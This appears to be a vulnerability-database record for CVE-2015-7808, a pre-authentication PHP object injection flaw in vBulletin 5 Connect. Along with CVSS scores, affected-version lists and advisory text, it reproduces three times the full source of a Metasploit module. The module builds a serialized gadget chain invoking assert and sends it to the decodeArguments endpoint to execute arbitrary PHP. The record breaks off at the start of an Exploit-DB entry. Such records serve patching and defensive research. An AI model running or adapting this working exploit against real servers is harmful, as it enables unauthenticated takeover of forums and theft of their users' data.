ID CVE-2015-7808Type cveReporter cve@mitre.orgModified 2015-11-25T20:23:00
Description
The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments.
{"id": "CVE-2015-7808", "bulletinFamily": "NVD", "title": "CVE-2015-7808", "description": "The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments.", "published": "2015-11-24T20:59:00", "modified": "2015-11-25T20:23:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7808", "reporter": "cve@mitre.org", "references": ["http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/", "http://packetstormsecurity.com/files/134331/vBulletin-5.1.2-Unserialize-Code-Execution.html", "http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq", "https://www.exploit-db.com/exploits/38629/", "https://blog.sucuri.net/2015/11/vbulletin-exploits-in-the-wild.html", "http://www.rapid7.com/db/modules/exploit/multi/http/vbulletin_unserialize"], "cvelist": ["CVE-2015-7808"], "type": "cve", "lastseen": "2020-10-03T12:49:56", "edition": 3, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/VBULLETIN_UNSERIALIZE"]}, {"type": "exploitdb", "idList": ["EDB-ID:38790", "EDB-ID:38629", "EDB-ID:48761"]}, {"type": "canvas", "idList": ["VBULLETIN_PREAUTH_DECODEARGUMENTS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:134331"]}, {"type": "saint", "idList": ["SAINT:B7AA4103B637A73ADBA0CB33967A79E7", "SAINT:00E348107935D0067623F69C0236D85E", "SAINT:1F05E43F59AE9CD9BA586F676801FF36"]}, {"type": "attackerkb", "idList": ["AKB:1FCD3A14-757C-421D-8FD2-D0A1E947ECBE"]}, {"type": "zdt", "idList": ["1337DAY-ID-34855", "1337DAY-ID-24540"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105447"]}], "modified": "2020-10-03T12:49:56", "rev": 2}, "score": {"value": 8.9, "vector": "NONE", "modified": "2020-10-03T12:49:56", "rev": 2}, "vulnersScore": 8.9}, "cpe": ["cpe:/a:vbulletin:vbulletin:5.1.6", "cpe:/a:vbulletin:vbulletin:5.0.2", "cpe:/a:vbulletin:vbulletin:5.1.7", "cpe:/a:vbulletin:vbulletin:5.0.4", "cpe:/a:vbulletin:vbulletin:5.0.5", "cpe:/a:vbulletin:vbulletin:5.0.1", "cpe:/a:vbulletin:vbulletin:5.1.5", "cpe:/a:vbulletin:vbulletin:5.1.9", "cpe:/a:vbulletin:vbulletin:5.1.3", "cpe:/a:vbulletin:vbulletin:5.0.0", "cpe:/a:vbulletin:vbulletin:5.1.1", "cpe:/a:vbulletin:vbulletin:5.1.2", "cpe:/a:vbulletin:vbulletin:5.1.4", "cpe:/a:vbulletin:vbulletin:5.1.0", "cpe:/a:vbulletin:vbulletin:5.1.8", "cpe:/a:vbulletin:vbulletin:5.0.3"], "affectedSoftware": [{"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.1"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.0.4"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.0.1"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.2"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.2"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.2"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.2"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.4"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.0.5"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.9"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.0.3"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.3"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.3"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.6"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.0.2"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.5"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.8"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.0"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.0"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.7"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.0.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:vbulletin:vbulletin:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.2:beta1:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.3:alpha5:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.0.2:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.0:rc1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.0.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.9:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.2:rc2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.3:alpha5:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.2:rc1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.2:beta1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.0.5:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"canvas": [{"lastseen": "2019-05-29T19:48:26", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "edition": 2, "description": "**Name**| vbulletin_preauth_decodeArguments \n---|--- \n**CVE**| CVE-2015-7808 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| vBulletin pre-auth remote code execution \n**Notes**| CVE Name: CVE-2015-7808 \nVENDOR: vBulletin Solutions \nNOTES: \n \nTested on Ubuntu 14.04 against: \n\\- vBulletin 5.1.4 \n\\- vBulletin 5.0.4 \n \nRepeatability: Infinite \nReferences: ['http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7808 \n\n", "modified": "2015-11-24T20:59:00", "published": "2015-11-24T20:59:00", "id": "VBULLETIN_PREAUTH_DECODEARGUMENTS", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/vbulletin_preauth_decodeArguments", "title": "Immunity Canvas: VBULLETIN_PREAUTH_DECODEARGUMENTS", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "description": "Added: 04/15/2016 \nCVE: [CVE-2015-7808](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7808>) \n\n\n### Background\n\nvBulletin is PHP software for building community websites. \n\n### Problem\n\nA vulnerability in vBulletin 5 Connect allows remote attackers to execute arbitrary PHP code by placing a specially crafted serialized object in the `**arguments**` parameter to the `**decodeArguments**` method. \n\n### Resolution\n\nUpgrade to vBulletin 5 Connect 5.1.10 or higher, or install the appropriate patch. \n\n### References\n\n<http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/> \n \n\n", "edition": 1, "modified": "2016-04-15T00:00:00", "published": "2016-04-15T00:00:00", "id": "SAINT:00E348107935D0067623F69C0236D85E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/vbulletin_decodearguments", "type": "saint", "title": "vBulletin decodeArguments serialized object vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "description": "Added: 04/15/2016 \nCVE: [CVE-2015-7808](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7808>) \n\n\n### Background\n\nvBulletin is PHP software for building community websites. \n\n### Problem\n\nA vulnerability in vBulletin 5 Connect allows remote attackers to execute arbitrary PHP code by placing a specially crafted serialized object in the `**arguments**` parameter to the `**decodeArguments**` method. \n\n### Resolution\n\nUpgrade to vBulletin 5 Connect 5.1.10 or higher, or install the appropriate patch. \n\n### References\n\n<http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/> \n \n\n", "edition": 4, "modified": "2016-04-15T00:00:00", "published": "2016-04-15T00:00:00", "id": "SAINT:B7AA4103B637A73ADBA0CB33967A79E7", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/vbulletin_decodearguments", "title": "vBulletin decodeArguments serialized object vulnerability", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:19:22", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "edition": 2, "description": "Added: 04/15/2016 \nCVE: [CVE-2015-7808](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7808>) \n\n\n### Background\n\nvBulletin is PHP software for building community websites. \n\n### Problem\n\nA vulnerability in vBulletin 5 Connect allows remote attackers to execute arbitrary PHP code by placing a specially crafted serialized object in the `**arguments**` parameter to the `**decodeArguments**` method. \n\n### Resolution\n\nUpgrade to vBulletin 5 Connect 5.1.10 or higher, or install the appropriate patch. \n\n### References\n\n<http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/> \n \n\n", "modified": "2016-04-15T00:00:00", "published": "2016-04-15T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/vbulletin_decodearguments", "id": "SAINT:1F05E43F59AE9CD9BA586F676801FF36", "type": "saint", "title": "vBulletin decodeArguments serialized object vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:32", "description": "", "published": "2015-11-13T00:00:00", "type": "packetstorm", "title": "vBulletin 5.1.2 Unserialize Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2015-11-13T00:00:00", "id": "PACKETSTORM:134331", "href": "https://packetstormsecurity.com/files/134331/vBulletin-5.1.2-Unserialize-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'vBulletin 5.1.2 Unserialize Code Execution', \n'Description' => %q{ \nThis module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9 \n}, \n'Platform' => 'php', \n'License' => MSF_LICENSE, \n'Author' => [ \n'Netanel Rubin', # reported by \n'cutz', # original exploit \n'Julien (jvoisin) Voisin', # metasploit module \n], \n'Payload' => \n{ \n'BadChars' => \"\\x22\", \n}, \n'References' => \n[ \n['CVE', '2015-7808'], \n['EDB', '38629'], \n['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'], \n['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/'] \n], \n'Arch' => ARCH_PHP, \n'Targets' => [ \n[ 'Automatic Targeting', { 'auto' => true } ], \n['vBulletin 5.0.X', {'chain' => 'vB_Database'}], \n['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}], \n], \n'DisclosureDate' => 'Nov 4 2015', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"]) \n], self.class) \nend \n \ndef check \nbegin \nres = send_request_cgi({ 'uri' => target_uri.path }) \nif (res && res.body.include?('vBulletin Solutions, Inc.')) \nif res.body.include?(\"Version 5.0\") \n@my_target = targets[1] if target['auto'] \nreturn Exploit::CheckCode::Appears \nelsif res.body.include?(\"Version 5.1\") \n@my_target = targets[2] if target['auto'] \nreturn Exploit::CheckCode::Appears \nelse \nreturn Exploit::CheckCode::Detected \nend \nend \nrescue ::Rex::ConnectionError \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nprint_status(\"#{peer} - Trying to inferprint the instance...\") \n \n@my_target = target \ncheck_code = check \n \nunless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears \nfail_with(Failure::NoTarget, \"#{peer} - Failed to detect a vulnerable instance\") \nend \n \nif @my_target.nil? || @my_target['auto'] \nfail_with(Failure::NoTarget, \"#{peer} - Failed to auto detect, try setting a manual target...\") \nend \n \nprint_status(\"#{peer} - Exploiting #{@my_target.name}...\") \n \nchain = 'O:12:\"vB_dB_Result\":2:{s:5:\"*db\";O:' \nchain << @my_target[\"chain\"].length.to_s \nchain << ':\"' \nchain << @my_target[\"chain\"] \nchain << '\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"assert\";}}s:12:\"*recordset\";s:' \nchain << \"#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}\" \n \nchain = Rex::Text.uri_encode(chain) \nchain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding \n \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'), \n'vars_get' => { \n'arguments' => chain \n}, \n'encode_params' => false, \n}) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134331/vbulletin_unserialize.rb.txt"}], "attackerkb": [{"lastseen": "2020-11-18T06:47:40", "bulletinFamily": "info", "cvelist": ["CVE-2015-7808"], "description": "The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments.\n\n \n**Recent assessments:** \n \n**busterb** at September 24, 2019 10:04pm UTC reported:\n\nAs the world\u2019s most popular forum software, this is a big target, and that this vulnerability was an 0-day when it was first found is also extremely useful as an attacker. When exploited, the vulnerability allows an attacker to execute PHP code on any vBulletin server without requiring user authentication. It works with the default installation, meaning every vBulletin site was vulnerable at one point.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**wvu-r7** at September 24, 2019 10:10pm UTC reported:\n\nAs the world\u2019s most popular forum software, this is a big target, and that this vulnerability was an 0-day when it was first found is also extremely useful as an attacker. When exploited, the vulnerability allows an attacker to execute PHP code on any vBulletin server without requiring user authentication. It works with the default installation, meaning every vBulletin site was vulnerable at one point.\n", "modified": "2020-02-13T00:00:00", "published": "2015-11-24T00:00:00", "id": "AKB:1FCD3A14-757C-421D-8FD2-D0A1E947ECBE", "href": "https://attackerkb.com/topics/tN54WQX49M/vbulletin-5-connect-5-1-2-through-5-1-9-php-object-injection-attack", "type": "attackerkb", "title": "vBulletin 5 Connect 5.1.2 through 5.1.9 PHP object injection attack", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-01-08T13:17:40", "description": "This Metasploit module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9", "edition": 2, "published": "2015-11-14T00:00:00", "type": "zdt", "title": "vBulletin 5.1.2 Unserialize Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2015-11-14T00:00:00", "id": "1337DAY-ID-24540", "href": "https://0day.today/exploit/description/24540", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin 5.1.2 Unserialize Code Execution',\r\n 'Description' => %q{\r\n This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9\r\n },\r\n 'Platform' => 'php',\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Netanel Rubin', # reported by\r\n 'cutz', # original exploit\r\n 'Julien (jvoisin) Voisin', # metasploit module\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2015-7808'],\r\n ['EDB', '38629'],\r\n ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],\r\n ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']\r\n ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [\r\n [ 'Automatic Targeting', { 'auto' => true } ],\r\n ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\r\n ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\r\n ],\r\n 'DisclosureDate' => 'Nov 4 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({ 'uri' => target_uri.path })\r\n if (res && res.body.include?('vBulletin Solutions, Inc.'))\r\n if res.body.include?(\"Version 5.0\")\r\n @my_target = targets[1] if target['auto']\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Version 5.1\")\r\n @my_target = targets[2] if target['auto']\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Trying to inferprint the instance...\")\r\n\r\n @my_target = target\r\n check_code = check\r\n\r\n unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to detect a vulnerable instance\")\r\n end\r\n\r\n if @my_target.nil? || @my_target['auto']\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to auto detect, try setting a manual target...\")\r\n end\r\n\r\n print_status(\"#{peer} - Exploiting #{@my_target.name}...\")\r\n\r\n chain = 'O:12:\"vB_dB_Result\":2:{s:5:\"*db\";O:'\r\n chain << @my_target[\"chain\"].length.to_s\r\n chain << ':\"'\r\n chain << @my_target[\"chain\"]\r\n chain << '\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"assert\";}}s:12:\"*recordset\";s:'\r\n chain << \"#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}\"\r\n\r\n chain = Rex::Text.uri_encode(chain)\r\n chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding\r\n\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),\r\n 'vars_get' => {\r\n 'arguments' => chain\r\n },\r\n 'encode_params' => false,\r\n })\r\n end\r\nend\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24540"}, {"lastseen": "2020-08-24T00:09:12", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2020-08-22T00:00:00", "title": "vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2020-08-22T00:00:00", "id": "1337DAY-ID-34855", "href": "https://0day.today/exploit/description/34855", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin 5.1.2 Unserialize Code Execution',\r\n 'Description' => %q{\r\n This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9\r\n },\r\n 'Platform' => 'php',\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Netanel Rubin', # reported by\r\n 'cutz', # original exploit\r\n 'Julien (jvoisin) Voisin', # metasploit module\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2015-7808'],\r\n ['EDB', '38629'],\r\n ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],\r\n ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']\r\n ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [\r\n [ 'Automatic Targeting', { 'auto' => true } ],\r\n ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\r\n ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\r\n ],\r\n 'DisclosureDate' => 'Nov 4 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\r\n ])\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({ 'uri' => target_uri.path })\r\n if (res && res.body.include?('vBulletin Solutions, Inc.'))\r\n if res.body.include?(\"Version 5.0\")\r\n @my_target = targets[1] if target['auto']\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Version 5.1\")\r\n @my_target = targets[2] if target['auto']\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n print_status(\"Trying to inferprint the instance...\")\r\n\r\n @my_target = target\r\n check_code = check\r\n\r\n unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to detect a vulnerable instance\")\r\n end\r\n\r\n if @my_target.nil? || @my_target['auto']\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to auto detect, try setting a manual target...\")\r\n end\r\n\r\n print_status(\"Exploiting #{@my_target.name}...\")\r\n\r\n chain = 'O:12:\"vB_dB_Result\":2:{s:5:\"*db\";O:'\r\n chain << @my_target[\"chain\"].length.to_s\r\n chain << ':\"'\r\n chain << @my_target[\"chain\"]\r\n chain << '\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"assert\";}}s:12:\"*recordset\";s:'\r\n chain << \"#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}\"\r\n\r\n chain = Rex::Text.uri_encode(chain)\r\n chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding\r\n\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),\r\n 'vars_get' => {\r\n 'arguments' => chain\r\n },\r\n 'encode_params' => false,\r\n })\r\n end\r\nend\n\n# 0day.today [2020-08-23] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/34855"}], "exploitdb": [{"lastseen": "2016-02-04T08:51:47", "description": "vBulletin 5.x - Remote Code Execution Exploit. CVE-2015-7808. Webapps exploit for php platform", "published": "2015-11-23T00:00:00", "type": "exploitdb", "title": "vBulletin 5.x - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2015-11-23T00:00:00", "id": "EDB-ID:38790", "href": "https://www.exploit-db.com/exploits/38790/", "sourceData": "#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit\r\n#[+] Product: vbulletin\r\n#[+] Vendor: http://vbulletin.com\r\n#[+] Vulnerable Version(s): Vbulletin 5.x\r\n#\r\n#\r\n# Author : Mohammad Reza Espargham\r\n# Linkedin : 